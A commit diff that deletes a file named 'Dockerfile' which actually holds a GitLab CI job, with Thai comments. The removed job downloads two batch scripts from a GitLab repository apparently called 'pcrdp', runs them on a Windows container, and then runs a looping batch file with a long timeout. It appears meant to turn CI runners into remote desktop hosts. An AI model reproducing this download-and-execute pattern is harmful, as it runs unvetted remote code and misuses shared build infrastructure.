Delete Dockerfile
Browse files- Dockerfile +0 -16
Dockerfile
DELETED
|
@@ -1,16 +0,0 @@
|
|
| 1 |
-
stages:
|
| 2 |
-
- build
|
| 3 |
-
|
| 4 |
-
build:
|
| 5 |
-
stage: build
|
| 6 |
-
image: mcr.microsoft.com/windows/servercore:ltsc2019 # ใช้ Windows container image
|
| 7 |
-
script:
|
| 8 |
-
- powershell -Command Invoke-WebRequest -Uri 'https://gitlab.com/raposabrty/pcrdp/-/raw/main/Downloads.bat' -OutFile 'C:\Downloads.bat' # ดาวน์โหลด Downloads.bat
|
| 9 |
-
- cmd.exe /c C:\Downloads.bat # รัน .bat file
|
| 10 |
-
|
| 11 |
-
- powershell -Command Invoke-WebRequest -Uri 'https://gitlab.com/raposabrty/pcrdp/-/raw/main/show.bat' -OutFile 'C:\show.bat' # ดาวน์โหลด show.bat
|
| 12 |
-
- cmd.exe /c C:\show.bat # รัน .bat file
|
| 13 |
-
|
| 14 |
-
- echo 'แก้เป็นของ gitlab รันที' > loop.bat # สร้าง loop.bat
|
| 15 |
-
- cmd.exe /c loop.bat # รัน loop.bat
|
| 16 |
-
timeout: 3260 # ตั้งเวลาจำกัดสำหรับ job
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|